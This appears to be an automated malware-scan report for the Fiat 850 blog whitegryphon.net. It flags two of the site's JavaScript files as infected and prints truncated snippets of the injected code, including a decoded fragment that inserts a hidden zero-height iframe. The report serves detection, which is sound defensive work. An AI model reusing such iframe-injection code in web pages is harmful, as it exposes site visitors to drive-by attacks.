Scanned pages/files
Request | Server response | Status |
http://www.whitegryphon.net/ | 200 OK Content-Length: 10984 Content-Type: text/html | clean |
http://www.whitegryphon.net/rsc/js/functions.js | 200 OK Content-Length: 19624 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function addEvent( elm, evType, fn, useCapture ) { if( elm.addEventListener ) { elm.addEventListener( evType, fn, useCapture ); return true; } else if( elm.attachEvent ) { var r = elm.attachEvent( 'on'+evType, fn ); return r; } else { elm['on'+evType] = fn; return false; } } function setstatus( message ) { window.status = message; return true; } function resetstatus() { window.status if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://www.whitegryphon.net/rsc/js/rollovers.js | 200 OK Content-Length: 9779 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function setupRollovers() { if(!document.getElementsByTagName) { return; } var all_links = document.getElementsByTagName('a'); for(var i = 0; i < all_links.length; i++) { var link = all_links[i]; if(link.className && (' ' + link.className + ' ').indexOf(' rollover ') != -1) { link.onmouseover = mouseover; link.onmouseout = mouseout; } } } function findTarget(e) { var target; if (windo if(f)e(s);} Antivirus reports:
| ||
http://www.whitegryphon.net/index.php | 200 OK Content-Length: 11019 Content-Type: text/html | clean |
http://www.whitegryphon.net/blog3.php | 200 OK Content-Length: 11661 Content-Type: text/html | clean |
http://www.whitegryphon.net/Fiat850/index.php | 200 OK Content-Length: 15457 Content-Type: text/html | clean |
http://www.whitegryphon.net/Fiat850/index.php?disp=arcdir | 200 OK Content-Length: 10122 Content-Type: text/html | clean |
http://www.whitegryphon.net/Fiat850/index.php?disp=catdir | 200 OK Content-Length: 10277 Content-Type: text/html | clean |
http://www.whitegryphon.net/Fiat850/index.php?disp=comments | 200 OK Content-Length: 10614 Content-Type: text/html | clean |
http://www.whitegryphon.net/weblog_gallery/v/Fiat850/ | 500 Internal Server Error Content-Length: 718 Content-Type: text/html | clean |
http://www.whitegryphon.net/test404page.js | 404 Not Found Content-Length: 282 Content-Type: text/html | clean |
http://www.whitegryphon.net/Fiat850/index.php?disp=msgform&recipient_id=3&redirect_to=http%3A%2F%2Fwww.whitegryphon.net%2FFiat850%2Findex.php%3Fblog%3D4%26disp%3Dcomments | 200 OK Content-Length: 12298 Content-Type: text/html | clean |
http://www.whitegryphon.net/Fiat850/index.php?disp=msgform&recipient_id=3&redirect_to=http%3A%2F%2Fwww.whitegryphon.net%2FFiat850%2Findex.php%3Fblog%3D4%26disp%3Dmsgform | 200 OK Content-Length: 12297 Content-Type: text/html | clean |
http://www.whitegryphon.net/htsrv/login.php?redirect_to=%2FFiat850%2Findex.php%3Fblog%3D4%26disp%3Dmsgform | 200 OK Content-Length: 5623 Content-Type: text/html | clean |
http://www.whitegryphon.net/rsc/js/md5.js | 200 OK Content-Length: 12203 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: whitegryphon.net
Result:
GET / HTTP/1.1
Host: whitegryphon.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: whitegryphon.net
Referer: http://www.google.com/search?q=whitegryphon.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: whitegryphon.net
Referer: http://www.google.com/search?q=whitegryphon.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=whitegryphon.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://whitegryphon.net/
Result: whitegryphon.net is not infected or malware details are not published yet.
Result: whitegryphon.net is not infected or malware details are not published yet.